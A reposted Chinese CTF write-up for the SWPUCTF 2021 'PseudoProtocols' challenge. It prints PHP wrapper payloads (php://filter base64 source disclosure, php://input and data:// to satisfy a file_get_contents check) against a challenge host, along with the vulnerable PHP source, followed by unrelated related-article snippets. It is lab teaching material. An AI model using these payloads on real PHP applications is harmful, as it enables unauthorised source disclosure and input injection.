站长工具

[SWPUCTF 2021 新生赛]PseudoProtocols

作者:YikJiang

[SWPUCTF 2021 新生赛]PseudoProtocols

一、题目

image-20221016174852038

二、WP

1、打开题目,发现提示我们是否能找到hint.php,并且发现URL有参数wllm。所以我们尝试利用PHP伪协议读取该文件

wllm=php://filter/read/convert.base64-encode/resource=hint.php

image-20221016175206506

2、对输出进行Baes64解码

<?php
//go to /test2222222222222.php
?>

3、访问/test2222222222222.php

image-20221016175405126

 <?php
ini_set("max_execution_time", "180");
show_source(__FILE__);
include('flag.php');
$a= $_GET["a"];
if(isset($a)&&(file_get_contents($a,'r')) === 'I want flag'){
    echo "success\n";
    echo $flag;
}
?>

代码的大概意思是为a参数利用file_get_contents()函数已只读的方式打开,如果内容等于I want flag的话,输出flag。

4、接下来有两种解法

①、php://input

​ 此方法需要条件,即开启allow_url_include=On。

​ 实际上这相当于一个远程包含的利用。

​ php://打开文件流后,我们直接在流里面写入我们的恶意代码,此时包含既可执行代码。

http://1.14.71.254:28463/test2222222222222.php?a=php://input

// 然后在POST里传入I want flag,则成功读取Flag

image-20221016180131092

②、data://

data://本身是数据流封装器,其原理和用法跟php://input类似,但是是发送GET请求参数。

http://1.14.71.254:28463/test2222222222222.php?a=data://text/plain,I want flag

image-20221016180330129

三、考点

PHP伪协议

php://filter
php://input
data://
本文转载于网络 如有侵权请联系删除

相关文章

  • 优思学院|抽样检验的意义是什么?

    对每一个产品的品质都能正确检验的话,便可确保其品质。为了确保每一个产品的品质,必须进行全数检验。但是如果像破坏检验(DestructiveInspection)那种性质的检验,所以令全数检验不可能进行,又或者进行全数检验成本很高時,都會考慮采用“抽样检验”(SamplingInspection)。抽样检验虽然不能保证每一个产品的质量,但它却可以在某个“机率”下,保证每批的质量。优思学院认为由于可节省检验费用,在经济观点上很有利,因此,根据商品的质量特性及其使用目的,抽样检验可以适用于很多情况。六西格玛课程但是,实施抽样检验时,其检验性质必须满足以下各条件:1.抽样检验的目的在于检验批的合格与否,因此产品可以批来处置。2.即使抽样检验的货批合格,也必须承认当中仍多少有不良品混入。3.抽样检验是以随机取样作为理论基础。样本的抽取必须依随机方式进行。此外,从过去的检验实绩、生产工程的管制状态,明确知道产品的质量水准时,有时考虑到对下个工程的影响,也采用免检制度。1.必须进行全数检验的情况(1)全数检验可以容易进行时:电灯泡的点灯测试或利用自动机器检验等不必太费工夫,且比起检验所花费用,所得效

  • JS封深入了解

    大家好,又见面了,我是全栈君,今天给大家准备了Idea注册码。1.javascript语言理解闭包js变量的范围分成两个:全局变量、局部变量。在全局变量的函数外声明变量,内部功能可以直接调用全局变量。声明变量里面的函数必须使用var命令,否则,它里面的函数声明一个全局变量。闭包的产生是为了从外部读取函数的局部变量,即在函数内部再定义一个函数f2,把f2作为返回值,在上层函数中返回就能够使上层函数读取其它函数的局部变量了。functionf1(){    n=999;    functionf2(){       alert(n);     }    returnf2;  }  varresult=f1();  result();//999闭包(closure)就是可以读取其它函数内部变量的函数。也可以说是定义在一个函数内部的函数。本质上,闭包就是将函数内部和函数外部连接起来的一座桥梁。闭包的用途:1.能够读取函数内部的变量2.让这些变量的值始终保持在内存中,由于f2依赖于f1的存在而存在。缺点:函数中的变量都被保存在内存中,使内存消耗非常大,所以不能滥用闭包,不然网页性能会减少,在IE

  • 拜耳与Recursion联手加强数字化药物发现

    作者/编辑|王建民2020年9月9日,拜耳与总部位于美国的Recursion公司(一家从事药物发现产业化的数字生物学公司)已达成战略合作协议。该合作伙伴关系将利用Recursion专门构建的人工智能指导的药物发现平台和拜耳的小分子化合物库以及深厚的科学专业知识来发现和开发针对肺、肾、心脏等多种纤维化疾病的新疗法。此外,拜耳公司旗下的影响力投资部门LeapsbyBayer正在主导Recursion的D轮融资,投资额为5000万美元。 拜耳股份公司制药部门执行委员会成员兼研发主管JoergMoeller医学博士说:拜耳正在推动研发领域的数字化转型,因为拜耳相信人工智能和机器学习等数字技术为解决许多疾病的复杂生物学问题和为患者确定新的治疗方法提供了无数新的机会。与Recursion的合作使拜耳能够发现针对新型生物学的小分子候选药物,以治疗纤维化疾病,并通过数字技术补充拜耳在心血管研究方面的专业知识。纤维化疾病是全世界发病率和死亡率的重要原因。治疗纤维化疾病的最大挑战之一是潜在的复杂生物学以及发现相关药物靶标的困难。表型筛选是一种筛选新型治疗分子以发现新型药物靶标及其在复杂疾病过程中的作用的方

  • 快速提升10倍效率的Word小技巧!

    内容简介整理了一些word的技巧,希望大家能记住!内容简介1.分割线 输出三个—,=,#,~,*,然后按一下Enter,就会出现各种样式的分割线2.删除页眉横线双击页眉后,点击[开始]——[样式]——[全部清除]——再次双击页眉3.批量存储图片点击[文件]——[另存为]——设置存储格式为[筛选过的网页]4.恢复文档点击[文件]——[信息]——[管理文档]——[恢复未保存的文档]——选择丢失文档——点击[另存为]5、标注读音选中文字——点击[开始]——[拼音指南]图标

  • 【目录】博客分类,方便查找

    版权声明:本文为博主原创文章,遵循CC4.0BY-SA版权协议,转载请附上原文出处链接和本声明。本文链接:https://blog.csdn.net/weixin_42159233/article/details/86680847个人文章目录!!!点击图片可直接跳转!!!一、风变编程(python小课)(一)python基础语法二、统计学习方法by李航【超详细版】N、杂项!!!点击图片可直接跳转!!!一、风变编程(python小课)(一)python基础语法––––二、统计学习方法by李航【超详细版】N、杂项––––––

  • 小程序云开发实现删除更新功能

    1:在页面上写上更新和删除的按钮 现在json里面引入vant组件{ "usingComponents":{ "van-button":"../../vant/button/index" } }复制在wxml里面填写删除更新按钮代码<van-buttontype="warning">更新</van-button> <van-buttontype="danger">删除</van-button>复制2:打开js用id:options.id把id先直接赋值过来,在页面加载的时候,页面里面就有了id,后续操作更加方便简单.onLoad:function(options){ //console.log(options) db.collection('books').doc(options.id).get({ success:res=>{ console.log(res.data) this.setData({ book:r

  • React Native 生命周期

    前言:     在面向对象编程中,任何对象的存在都会存在生命周期。类似我们iOS的View,就会有LoadView,ViewWillAppear,ViewDidLoad等等生命周期。RN也不例外,这篇主要学习RN的生命周期,在开发中如果掌握了并熟练的运用生命周期函数的话,往往开发能事半功倍。ReactNative生命周期简介如图,可以把组件生命周期大致分为三个阶段:第一阶段:是组件第一次绘制阶段,如图中的上面虚线框内,在这里完成了组件的加载和初始化;第二阶段:是组件在运行和交互阶段,如图中左下角虚线框,这个阶段组件可以处理用户交互,或者接收事件更新界面;第三阶段:是组件卸载消亡的阶段,如图中右下角的虚线框中,这里做一些组件的清理工作。生命周期回调函数(ES5写法)下面来详细介绍生命周期中的各回调函数,先说下和上图对应的ES5写法。getDefaultProps在组件创建之前,会先调用 getDefaultProps(),这是全局调用一次,严格地来说,这不是组件的生命周期的一部分。在组件被创建并加载候,首先调用 getInitialState(),来初始化组件的状态。componentW

  • 大数据24小时 | Tumblr宣布 6000多万邮箱密码被盗,华谊嘉信5.8亿元布局新媒体大数据

    LinkedIn之后Tumblr再遇数据泄露,6000多万邮箱密码被盗在刚刚结束的2016数博会上,“数据安全”这一问题不断被提及,可见其重要性。然而,关注是一方面,现实又是另一方面。近日,国外企业再揭“数据泄露”风波,继LinkedIn和Adobe之后,Tumblr宣布该网站65,469,298个邮箱账号和密码遭到泄露,并坐稳数据泄露“光荣榜”第三名的位置。值得一提的是,这已经是近两个月内第三次发生电子邮件泄露,此前泄露数量均达数亿个。大数据时代的出现,让我们开阔了视野,享受着智能化带来新奇的同时,我们也在承受着互联网带来的“裸奔”之感,我们越是享受数字化的便利,隐私则越是奢望。信雅达重金加码“金融大数据”,拟9.6亿元收购金网安泰日前,位于杭州市的银行IT综合解决方案提供商信雅达宣布将拟9.6亿元人民币收购金网安泰80%股权,进一步打通交易数据资源,布局“金融大数据”。据悉,金网安泰成立于1999年,专注于商品电子商务领域,是一家电子贸易服务提供商。本次收购完成之后,信雅达将利用金网安泰多年来所积累的商品交易市场的资源和数据,进一步对数据和客户资源进行整合,从而拓展供应链金融业务。

  • 特朗普推特屡次震荡股市,华尔街积极研发 NLP 算法从中牟利

    【新智元导读】美国下任总统Trump本周两次发推,分别导致洛克希德·马丁和波音两大巨头股价在短期内遭受大幅震荡。有分析人士认为,华尔街正面临全新的“总统抨击风险”,大公司所受威胁可能最大。但另一方面,Trump的推文也为华尔街的交易者提供了一个机会,已经有人开始开发算法,希望通过分析Trump推特带给市场的波动从中获利。在华尔街,能撬动股票的人被称为“斧头”(axe)。特朗普因为频发措辞激烈的推特,已迅速成为当前华尔街最大的斧头。全新“总统抨击风险”让巨头面临最大威胁下届总统唐纳德·特朗普在周一上午8:30,发布了一条推特,抨击防务承包商洛克希德·马丁公司。到了中午,他的推文已让这家公司市值蒸发40亿美元。在特朗普批评了洛克希德·马丁公司的战斗机项目后,华尔街交易商开始倾销该公司的股票:“F-35计划和成本已失去控制,”特朗普在推特中说。“1月20日之后(译注:也即他当上总统后),军用(和其他)开支将节省数十亿美元。”特朗普拥有数百万的推特粉丝,并即将接受世界上最有权力的职位,他向华尔街带来了前所未见的挑战和机会。交易者不仅要监视这位下任总统说的每一个字,还必须关注他的推特更新。一些人

  • Android 配置Freeline教程

    Freeline简介Freeline是蚂蚁金服旗下一站式理财平台蚂蚁聚宝团队15年10月在Android平台上的量身定做的一个基于动态替换的编译方案,5月阿里集团内部开源,稳定性方面:完善的基线对齐,进程级别异常隔离机制。性能方面:内部采用了类似Facebook的开源工具buck的多工程多任务并发思想:端口扫描,代码扫描,并发编译,并发dx,并发mergedex等策略,在多核机器上有明显加速效果,另外在class及dex,resources层面作了相应缓存策略,做到真正增量开发,另外引入并优化buck的部分加速组件dx,DexMerger,资源编译方面,深入改造了Aapt资源编译流程,当资源发生改变时候,秒级完成增量包编译,其中增量包仅含最小的变更集合(10Kb~数百Kb内),后期也被运用到线上进行资源/代码动态替换。相比目前instant-run,buck,layoutcast等方案快数倍速度。安装python环境打开官网https://www.python.org/点击下载安装 注意:freeline只支持2.7.X版本配置高级环境变量,PATH结尾加入:;C:\Python27复

  • 操作步骤:EasyCVR平台国标GB设备如何正确配置告警预案?

    EasyCVR的告警预案是指,在告警配置中,用户可以根据告警类型、告警级别、告警方式、告警事件类型等信息,来具体分类获取告警信息。在上期的文章中,我们介绍了关于EasyCVR平台告警预案功能的开发设计,感兴趣的用户可以查看这篇文章:AI人脸检测智能视频融合平台EasyCVR新增告警预案功能。今天我们来具体介绍下,国标设备如何根据不同类型的告警,来分配不同的告警预案。操作步骤如下:1)依次点击【配置中心】-【告警预案】-【添加预案】:2)新建告警预案,并设置告警的类型,如果未知设备告警类型,请全部选择“全部”,若无特殊要求,快照、告警录像的时间请使用默认配置,如下图:3)关联相关通道,如下图:4)打开启用按钮的开关,开启告警预案,如下图:5)最后实现效果如下所示(该通道已设置接收全部告警):EasyCVR平台的告警功能可以对监控设备上传的告警(离线、遮挡、故障等)及AI监测的异常情况进行及时告警,可抓取所有设备记录的告警状态与信息,获取告警时刻的视频截图,同时,平台还将告警消息通过语音、短信、APP、消息通知、微信、邮件等方式推送给管理人员,方便管理人员及时查看与处理。随着安防市场的不断

  • JavaScript高级程序设计——从头学(3)

    对象基础 1、OOP 2、对象应用 3、对象的类型   3.1本地对象     ECMA-262t将本地对象(nativeobject)定义为“独立于宿主环境的ECMAScript实现提供的对象”。简单的来说,本地对象是ECMA-262定义的类(引用类型)。     它们包括:     Object    Function  Array  String  Boolean     Number   Date    RegExp Error  EvalError     RangeError  ReferenceError  SyntaxError   TypeError   URIError   3.2内置对象     ECMA-262把内置对象(built-inobject)定义为“由ECMAScript实现提供的、独立于宿主环境的所有对象,在ECMAScript程序开始执行时出现”。     ECMA-262只定义了两个内置对象:Global和Math。内置对象也是本地对象。     在ECMAScript中,不存在独立的函

  • Ubuntu Desktop 编译 ffmpeg (简略的写写)

    关于ffmpeg FFmpeg是一個自由軟體,可以執行音訊和視訊多種格式的錄影、轉檔、串流功能,包含了libavcodec——這是一個用於多個專案中音訊和視訊的解碼器函式庫,以及libavformat——一個音訊與視訊格式轉換函式庫。 --以上内容摘自https://zh.wikipedia.org/wiki/FFmpeg   环境 UbuntuDesktop16.04LTS   FFmpeg配置 1.关于yasm 在安装ffmpeg之前,还是先安装下yasm吧 (其实,也可以不装,在编译ffmpeg的时候加上--disable-yasm参数即可) 那么yasm是做什么用的呢? Yasm isacompleterewriteofthe NASMassembler underthe “new”BSDLicense (someportionsareunderotherlicenses,see COPYING fordetails). Yasmcurrentlysupportsthex86andA

  • 软工+C(11): 从命令行开始逐步培养编程能力(Java)

    上一篇:助教指南,持续更新... //Version:0.0.4 许多人,所不知道的是,每一种编程语言都有其对应的单元测试框架,对程序在不同阶段的测试环节也概念模糊。在实际动手编写程序许久之后才听说“单元测试”、“模块测试”、“集成测试”这三个重要的测试阶段。从一个程序的角色来说,“单元测试”、“模块测试”、“集成测试”这三个部分就是最核心的测试环节。断言,就像任何阶梯型技术一样,通常情况下“单元测试”、“模块测试”、和“集成测试”三者的最佳比例应该保持7:2:1的黄金比例([1],如果不对,请你提出更合理的比例,并论证)。抛开你一定会做的集成测试不说,断言,优秀的程序应该像猎人一样对单元测试和模块测试保持敏感。回到开头,每一种编程语言都有其对应的单元测试框架,你可以从这些编程语言相关的单元测试框架茫茫多的文档里,从HelloWorld开始学习单元测试。断言,基本上你也就只会学了单元测试框架的HelloWorld,然后就再也不看这些写的十分冗长的文档了。 那么,本文就是为你这样重视单元测试和模块测试的优秀的程序提供的一个独特的的视角。开门见山,我们会以最直接的方式展示游离在单元测试和模

  • 每日一道 LeetCode (52):三数之和

    每天3分钟,走上算法的逆袭之路。 前文合集 每日一道LeetCode前文合集 代码仓库 GitHub:https://github.com/meteor1993/LeetCode Gitee:https://gitee.com/inwsy/LeetCode 题目:三数之和 难度:中等 题目来源:https://leetcode-cn.com/problems/3sum/ 给你一个包含n个整数的数组 nums,判断 nums 中是否存在三个元素a,b,c,使得 a+b+c=0?请你找出所有满足条件且不重复的三元组。 注意:答案中不可以包含重复的三元组。 示例: 给定数组nums=[-1,0,1,2,-1,-4], 满足要求的三元组集合为: [ [-1,0,1], [-1,-1,2] ] 复制 解题思路 之前一段时间都在写JVM和Tomcat的一系列相关的文章,刷力扣题就给空下了,今天开始接着捡起来做题。 首先这道题我第一个反应是套三个循环,肯定做得出来,时间复杂度是O(n^3),放在力扣里面,按照一贯的尿性结果肯定是超时,这个方案我现在都已

  • 笔试:找出一个字符串中字符出现最多的次数和该字符

    我用的是js, 每次取出字符串的第一个字母,然后把和它相同的字符利用“”替换掉,然后来比较替换前和替换后的字符串长度相差多少, 那么差值就是就是里面该字符的个数,找出这个差值最大的就是和所对应的替换字符。 varstr="djlxsdjlxs";//命名一个变量放置给出的字符串 varmaxLength=0;//命名一个变量放置字母出现的最高次数并初始化为0 varresult='';//命名一个变量放置结果输入 while(str!=''){//循环迭代开始,并判断字符串是否为空 oldStr=str;//将原始的字符串变量赋值给新变量 getStr=str.substr(0,1);//用字符串的substr的方法得到第一个字符(首字母) eval("str=str.replace(/"+getStr+"/g,'')");//详细如补充 if(oldStr.length-str.length>maxLength){//判断原始的字符串的长度减去替代后字符串长度是否大于之前出现的最大的字符串长度 maxLength=oldStr.length-str.length;//两

  • js 新语法 async await的使用

    随着es6的更新与普及新的语法又在es7、es8中推广与更进一步; es5的同步处理请求的方式: server.getUser().then((res)=>{ if(res.status=='success'){ console.log('请求成功') getAddress(res.model.id)//成功后再继续发下一个请求 }else{ console.log('请求失败') } }) functiongetAddress(userid){ server.getAddress({id:userid}).then((res)=>{ if(res.status=='success'){ console.log('请求成功') //处理逻辑 }else{ console.log('请求失败') } }) } 复制   点评:此处至少有两个问题        1.代码没有加异常处理,如果接口返回失败或代码质量报错,会造成代码阻塞卡死应用; &nbs

  • mycat中间件安装与使用

    前提: 安装JDK版本在7.0及其以上 1、下载: 下载地址在:http://dl.mycat.io/      选择1.6-release版本下载 2、安装: 直接解压即可: tar-zxf Mycat-server-1.6-RELEASE-20161028204710-linux.tar.gz 3、配置: 配置JDK环境变量,mycat环境变量 vim/etc/profile MYCAT_HOME=/usr/local/Mycat vim/etc/hosts      配置集群对应IP     wrapper.conf:用来配置JVM虚拟机内存 wrapper.java.command=/lib/jvm/bin/java      #JAVA目录下JAVA命令所在 wrapper.working.dir=.. ---------------------------JVM参数调优------------------------------------- wrapper.java.additional.1=-DMYCAT_HOME=. wrapper.ja

  • java.lang.NoClassDefFoundError: Could not initialize class异常处理

    借鉴:http://blog.csdn.net/sleepdancer/article/details/9207425static{ InputStreamin=XXX.class.getResourceAsStream("/conf/abc.properties"); try{ prop.load(in); }catch(IOExceptione){ e.printStackTrace(); } }复制 应用程序跑的时候,突然报出来Causedby:Java.lang.NoClassDefFoundError:Couldnotinitializeclasscom.xxx.xxx.XXX错误,当时第一反应就是.NoClassDefFoundError,肯定是类找不到了。于是赶紧看看代码,发现使用类的调用处没有任何的编译错误,这样的话就很迷惑了,为什么会NoClassDefFoundError错误呢。重新编译检查了一遍之后,还是报出来同样的错误,于是后面的错误信息引起了注意【Couldnotinitialize】。       &nbs

  • Cannot send session cache limiter - headers already sent

    Cannotsendsessioncachelimiter-headersalreadysent   调用session_start()之前有静态的html输出,所以要把session_start放在html代码之前   如果已经是html代码前,且php文件为utf8编码,那这个错误很可能就是由这个php文件的utf-8的BOM问题引起的,您需要设置您的编辑器在编辑utf-8文件时不添加BOM.(require_once包含被包含的文件都要去掉BOM) Dreamweaver        

  • java多线程中synchronized关键字的用法

    转自:http://www.cdtarena.com/javapx/201308/9596.html      由于同一进程内的多个线程共享内存空间,在Java中,就是共享实例,当多个线程试图同时修改某个实例的内容时,就会造成冲突,因此,线程必须实现共享互斥,使多线程同步。    最简单的同步是将一个方法标记为synchronized,对同一个实例来说,任一时刻只能有一个synchronized方法在执行。当一个方法正在执行某个synchronized方法时,其他线程如果想要执行这个实例的任意一个synchronized方法,都必须等待当前执行synchronized方法的线程退出此方法后,才能依次执行。    但是,非synchronized方法不受影响,不管当前有没有执行synchronized方法,非synchronized方法都可以被多个线程同时执行。    此外,必须注意,只有同一实例的synchronized方法同一时间只能被一个线程执

相关推荐

推荐阅读